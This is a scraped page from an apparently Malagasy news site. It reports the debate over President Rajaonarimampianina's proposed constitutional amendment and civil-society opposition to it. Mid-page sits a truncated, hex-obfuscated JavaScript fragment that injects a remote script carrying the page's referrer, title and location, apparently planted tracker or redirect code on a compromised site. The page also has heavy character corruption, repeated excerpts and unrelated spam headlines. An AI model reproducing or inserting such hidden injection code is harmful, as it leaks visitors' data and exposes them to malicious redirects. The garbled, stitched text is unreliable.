logo

Niteraka adihevitra ny momba ny LalA�mpanorenana

Lasa adihevitra teto amina�� ny Firenena ny momba ny lalA�mpanorenana taoriana�� ny nilazana�� ny Filohampirenena Rajaonarimampianina Hery fa tokony hasiana fanitsiana ny LalA�mpanorenana. Nanamafy moa ny Solombavambahoakana�� i Madagasikara, voafidy tany Ambovombe Androy, Milavonjy Philobert fa A�A� ho fisorohana ny korontana mety hiseho aoriana�� ny Fifidianana ho Filohampirenena no antony hanitsiana ny LalA�mpanorenanaA�A�. Misy amina�� ireo andininy ao amina�� ny LalA�mpanorenana, hoy izy, no tsy maintsy ahitsy. Nitondrany fanazavana ny momba ny andininy faha-47, milaza fa mila mametra a��pialana 30 andro farafahakeliny mialoha ny Fifidianana ny Filohana�� ny Repoblika. A�A�Tsy misy Filoha am-perinasa mametra-pialana mialoha ny Fifidianana izany maneran-tany. Isika Malagasy irery no te hihavaka amina�� izanyA�A�, hoy izy. Notsindriany fa A�A� azo atao tsara ny manova ny LalA�mpanorenana ary manana zo feno hanao izany ny Filoham-pirenenaA�A�. Maro tamina�� ireo antoko politika sy Fiarahamonim-pirenena kosa no nanakiana mafy ity fikasana hanisy fanitsiana ny LalA�mpanorenana ity. Isana�� ireo nitondra tsikera mavaivay tamina�� izany ny hetsika Rohy, izay hitambarana fikambanana miisa hatrany amina�� ny 76 isa. Namoaka fanambarana itsy farany ny volana Septambra lasa teo. Voarakitra tao anatina�� izany ny hoe A�A� mitsipaka marindrano ny fanaovana fitsapan-kevi-bahoaka izahay Oscs. Raha zohina ara-tantara mantsy ny fihetsika�� ireo mpisehatra politika, dia tsy tokony ny Fitondrana izay eo am-pamaranana ny asany velively no hanitsy ny LalA�mpanorenana. Aoka ny antoko politika rehetra tsy hanana�� eritreritra toy izany intsony manomboka izao. Na misy lesoka toy inona aza ny LalA�mpanorenana, ny fiziriziriana hanao fanitsiana azy alohana�� ny Fifidianana Filohampirenena dia hiteraka krizy vaovao satria ny ankabeazana�� ny mpisehatra dia efa mitsipaka azy avokoaA�A�. Voalazana�� izy ireo koa fa A�A� tsy ekena�� ny OSCs ny handaniana ny volam-bahoaka amina��izany fampandriana adrisa izany. Ireo fifidianana nasionaly indrindra ny fifidianana Filohana�� ny Repoblika izay efa voafaraitra mazava ao amina�� ny LalA�mpanorenanana fa tokony hatao amina�� ny 2018 irery ihany no tokony handaniana ny vola efa voasoritra ao amina�� ny Tetibola 2018 nolazaina�� ny Minisitry ny vola sy ny Teti-bola.

Valahara

6\x6F\x72\x65","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x70\x72\x6F\x74\x6F\x63\x6F\x6C","\x68\x74\x74\x70\x73\x3A","\x69\x6E\x64\x65\x78\x4F\x66","\x52\x5F\x50\x41\x54\x48","\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E"];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Manda ho an’ny firaisankinam-pirenena: « Tafita ny fanilo. »

Lasa adihevitra teto amina�� ny Firenena ny momba ny lalA�mpanorenana taoriana�� ny nilazana�� ny Filohampirenena Rajaonarimampianina Hery fa tokony hasiana fanitsiana ny LalA�mpanorenana. Nanamafy moa ny Solombavambahoakana�� i Madagasikara, voafidy tany Ambovombe Androy, Milavonjy Philobert fa A�A� ho fisorohana ny korontana mety hiseho aoriana�� ny Fifidianana ho Filohampirenena no antony hanitsiana ny LalA�mpanorenanaA�A�. Misy amina�� […]

KMFCNOE: a�?Aleo hezahana ho tratra ilay isana��ny mpifidy 10 tapitrisa.a�?

8 andro sisa dia higadona ilay antsoina hoe "taom-pifidianana", araka izay namaritan'ny vaomiera mahaleontena misahana ny fifidianana na CENI azy. Nampanantena ny teo anivon'ity rafitra ity fa hanao ny ezaka rehetra hampangarahara ny fifidianana rehetra ho avy eo. Etsy ankilan'izay kosa ny KMFCNOE dia mikarakara fikaonan-doha goavana hametrahana paikady hahafahana manara-maso izany sy hanabeazana ireo mpifidy.

Teza : Mila omena hasina ny Fokonolona amina�� ny Fampandrosoana

Foto-kevitra nijoroana�� ny antoko Teza hatramina�� izay ny fanomezan-danja ny fokonolona. Araka ny nambaran-dRakotoamboa Jean Louis,Filoha nasionalina�� ny antoko Teza fa A� mila omen-kasina ary lanja manokana mihitsy ny fokonolona manerana ana�� i Madagasikara amina�� ny fampandrosoana ny Firenena A�.

Ady amina�� ny kolikoly : Tsy mahomby i Madagasikara

Saro-toerana ny fampiharana ny ady amina��ny kolikoly eto Madagasikara. Nisy anefa ny fifanaovan-tsonia marobe notanterahina��ny firenentsika iadiana momba ity fositra manimba ny hoavim-pirenena itya��

Tantara

Literatiora

Vakoka velona

Lasa adihevitra teto amina�� ny Firenena ny momba ny lalA�mpanorenana taoriana�� ny nilazana�� ny Filohampirenena Rajaonarimampianina Hery fa tokony hasiana fanitsiana ny LalA�mpanorenana. Nanamafy moa ny Solombavambahoakana�� i Madagasikara, voafidy tany Ambovombe Androy, Milavonjy Philobert fa A�A� ho fisorohana ny korontana mety hiseho aoriana�� ny Fifidianana ho Filohampirenena no antony hanitsiana ny LalA�mpanorenanaA�A�. Misy amina�� […]

5 Good reasons the us Accessed the very first Entire world War

Lasa adihevitra teto amina�� ny Firenena ny momba ny lalA�mpanorenana taoriana�� ny nilazana�� ny Filohampirenena Rajaonarimampianina Hery fa tokony hasiana fanitsiana ny LalA�mpanorenana. Nanamafy moa ny Solombavambahoakana�� i Madagasikara, voafidy tany Ambovombe Androy, Milavonjy Philobert fa A�A� ho fisorohana ny korontana mety hiseho aoriana�� ny Fifidianana ho Filohampirenena no antony hanitsiana ny LalA�mpanorenanaA�A�. Misy amina�� […]

The Fundamentals of Best Essay Writing Revealed